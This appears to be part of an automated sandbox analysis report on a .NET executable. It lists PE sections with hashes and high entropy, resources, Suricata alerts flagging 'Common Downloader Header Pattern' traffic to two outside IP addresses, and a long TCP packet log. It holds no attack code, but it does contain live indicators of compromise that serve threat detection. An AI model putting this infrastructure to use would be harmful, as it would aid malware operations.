IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb9440	0xb9600	4401043a1b753c9773c89bd6d8684a26	False	0.9328430546190155	data	7.909567582919158	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x1340	0x1400	7c99c68e50e97a157fb7a05f8b28a873	False	0.7447265625	data	6.915634972806765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbe000	0xc	0x200	c6287476086ff22d4f014ca3881d90f1	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xbc0c8	0xf1a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8706673564407656
RT_GROUP_ICON	0xbcff4	0x14	data	1.05
RT_VERSION	0xbd018	0x324	data	0.42786069651741293

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T22:41:07.636679+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49707	132.226.8.169	80	TCP
2024-10-07T22:41:09.385038+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49707	132.226.8.169	80	TCP
2024-10-07T22:41:09.992692+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49710	188.114.97.3	443	TCP
2024-10-07T22:41:10.869428+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49712	132.226.8.169	80	TCP
2024-10-07T22:41:10.869433+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49713	132.226.8.169	80	TCP
2024-10-07T22:41:11.806934+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49712	132.226.8.169	80	TCP
2024-10-07T22:41:13.213999+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49717	132.226.8.169	80	TCP
2024-10-07T22:41:13.346743+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49718	188.114.97.3	443	TCP
2024-10-07T22:41:14.181935+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49720	132.226.8.169	80	TCP
2024-10-07T22:41:14.900722+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49721	132.226.8.169	80	TCP
2024-10-07T22:41:15.482436+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49724	188.114.97.3	443	TCP
2024-10-07T22:41:15.635067+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49723	132.226.8.169	80	TCP
2024-10-07T22:41:16.369460+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49725	132.226.8.169	80	TCP
2024-10-07T22:41:17.463221+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49727	132.226.8.169	80	TCP
2024-10-07T22:41:18.166331+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49729	132.226.8.169	80	TCP
2024-10-07T22:41:18.722704+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49732	188.114.97.3	443	TCP
2024-10-07T22:41:18.835893+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49733	188.114.97.3	443	TCP
2024-10-07T22:41:20.697622+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49735	132.226.8.169	80	TCP
2024-10-07T22:41:21.235365+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49737	188.114.97.3	443	TCP
2024-10-07T22:41:23.011472+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49744	188.114.97.3	443	TCP
2024-10-07T22:41:23.858996+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49747	188.114.97.3	443	TCP
2024-10-07T22:41:25.388137+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49749	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 22:41:06.470685005 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:06.475687981 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:06.475789070 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:06.476396084 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:06.481581926 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:07.285541058 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:07.289518118 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:07.294444084 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:07.590934992 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:07.636678934 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:07.645154953 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:07.645180941 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:07.646270037 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:07.653541088 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:07.653558969 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:08.205784082 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:08.205976963 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:08.211211920 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:08.211226940 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:08.211705923 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:08.260730982 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:08.520812988 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:08.567394972 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.008696079 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.008960962 CEST	443	49709	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.009043932 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.047812939 CEST	49709	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.051461935 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:09.057122946 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:09.335439920 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:09.342606068 CEST	49710	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.342643976 CEST	443	49710	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.342991114 CEST	49710	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.342991114 CEST	49710	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.343019962 CEST	443	49710	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.385037899 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:09.554589987 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:09.559529066 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:09.559639931 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:09.559895039 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:09.564786911 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:09.807334900 CEST	443	49710	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.810163021 CEST	49710	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.810183048 CEST	443	49710	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.992599010 CEST	443	49710	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.992831945 CEST	443	49710	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:09.992929935 CEST	49710	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.993452072 CEST	49710	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:09.997298002 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:09.998163939 CEST	49713	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:10.003705025 CEST	80	49713	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:10.003865957 CEST	49713	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:10.003928900 CEST	49713	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:10.003988028 CEST	80	49707	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:10.004029036 CEST	49707	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:10.010195971 CEST	80	49713	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:10.419563055 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:10.429023027 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:10.434133053 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:10.816339016 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:10.827805996 CEST	80	49713	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:10.828882933 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:10.828958988 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:10.829065084 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:10.829344034 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:10.829361916 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:10.848448992 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:10.848483086 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:10.848683119 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:10.852478981 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:10.852492094 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:10.869427919 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:10.869432926 CEST	49713	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:11.293337107 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.295067072 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.295103073 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.295515060 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.295589924 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.296869040 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.296876907 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.297154903 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.338180065 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.348226070 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.391411066 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.432152987 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.432255030 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.432375908 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.432909966 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.438008070 CEST	49713	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:11.439915895 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:11.443366051 CEST	80	49713	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:11.443583012 CEST	49713	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:11.444891930 CEST	80	49717	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:11.444978952 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:11.445122004 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:11.450989962 CEST	80	49717	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:11.453001022 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.453104019 CEST	443	49716	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.453232050 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.463637114 CEST	49716	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.467271090 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:11.472229004 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:11.752085924 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:11.754415035 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.754472971 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.754544973 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.754817009 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:11.754829884 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:11.806934118 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.202253103 CEST	80	49717	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:13.203536034 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:13.203809023 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:13.203845024 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:13.204057932 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:13.204219103 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:13.204229116 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:13.205627918 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:13.205656052 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:13.213942051 CEST	80	49717	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:13.213993073 CEST	80	49717	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:13.213999033 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.214037895 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.214097977 CEST	80	49717	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:13.214143991 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.346759081 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:13.346853018 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:13.346924067 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:13.347356081 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:13.352504969 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.354221106 CEST	49720	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.357691050 CEST	80	49712	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:13.357769966 CEST	49712	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.359074116 CEST	80	49720	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:13.359152079 CEST	49720	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.359287977 CEST	49720	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:13.364151955 CEST	80	49720	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:13.648467064 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:13.650039911 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:13.650058985 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.005882025 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.005984068 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.006125927 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.006699085 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.010773897 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.012022018 CEST	49721	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.015957117 CEST	80	49717	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.016141891 CEST	49717	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.016845942 CEST	80	49721	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.016912937 CEST	49721	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.017002106 CEST	49721	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.021765947 CEST	80	49721	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.138420105 CEST	80	49720	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.139478922 CEST	49722	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.139514923 CEST	443	49722	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.139592886 CEST	49722	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.139839888 CEST	49722	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.139853001 CEST	443	49722	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.181935072 CEST	49720	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.609342098 CEST	443	49722	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.611296892 CEST	49722	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.611329079 CEST	443	49722	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.781270981 CEST	443	49722	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.781378031 CEST	443	49722	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.781433105 CEST	49722	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.782150030 CEST	49722	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.790396929 CEST	49720	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.793179035 CEST	49723	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.797075033 CEST	80	49720	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.797142029 CEST	49720	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.799170017 CEST	80	49723	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.799245119 CEST	49723	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.799417019 CEST	49723	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:14.805448055 CEST	80	49723	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.857388020 CEST	80	49721	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:14.858529091 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.858572960 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.858745098 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.858887911 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:14.858894110 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:14.900722027 CEST	49721	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:15.317159891 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:15.356364965 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:15.356391907 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:15.482460976 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:15.482549906 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:15.482671976 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:15.483020067 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:15.487782001 CEST	49721	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:15.489511013 CEST	49725	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:15.493567944 CEST	80	49721	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:15.493623972 CEST	49721	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:15.494693995 CEST	80	49725	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:15.494827986 CEST	49725	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:15.494924068 CEST	49725	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:15.500190020 CEST	80	49725	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:15.586885929 CEST	80	49723	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:15.588115931 CEST	49726	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:15.588157892 CEST	443	49726	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:15.588311911 CEST	49726	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:15.588692904 CEST	49726	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:15.588710070 CEST	443	49726	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:15.635066986 CEST	49723	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.026753902 CEST	443	49726	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.046257019 CEST	49726	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.046278000 CEST	443	49726	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.166667938 CEST	443	49726	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.166759014 CEST	443	49726	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.166835070 CEST	49726	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.167243958 CEST	49726	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.169986963 CEST	49723	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.170984030 CEST	49727	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.175853968 CEST	80	49727	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:16.175992012 CEST	49727	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.176058054 CEST	49727	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.180967093 CEST	80	49727	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:16.198179960 CEST	80	49723	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:16.198939085 CEST	49723	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.323551893 CEST	80	49725	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:16.324861050 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.324898005 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.325115919 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.325268984 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.325278997 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.369460106 CEST	49725	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.772660971 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.774358034 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.774382114 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.936009884 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.936819077 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:16.936932087 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.937448025 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:16.940635920 CEST	49725	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.942048073 CEST	49729	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.946849108 CEST	80	49729	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:16.947329998 CEST	49729	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.947520018 CEST	49729	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.949309111 CEST	80	49725	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:16.951458931 CEST	49725	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:16.952320099 CEST	80	49729	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:17.414197922 CEST	80	49727	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:17.428443909 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:17.428476095 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:17.428529978 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:17.429038048 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:17.429052114 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:17.437480927 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:17.450886011 CEST	49731	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:17.456015110 CEST	80	49731	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:17.456722021 CEST	49731	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:17.456722021 CEST	49731	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:17.461702108 CEST	80	49731	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:17.463221073 CEST	49727	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:17.483428001 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:17.887120962 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:17.887228966 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.120951891 CEST	80	49729	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:18.122713089 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.122751951 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.122816086 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.123285055 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.123301029 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.166331053 CEST	49729	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.270153999 CEST	80	49731	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:18.272142887 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.272176981 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.272372007 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.272608995 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.272620916 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.323199034 CEST	49731	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.588705063 CEST	443	49732	188.114.97.3	192.168.2.8
